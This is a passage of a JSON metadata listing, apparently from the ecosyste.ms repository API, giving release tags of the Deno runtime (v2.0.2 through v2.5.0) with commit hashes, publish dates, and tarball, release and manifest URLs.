92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.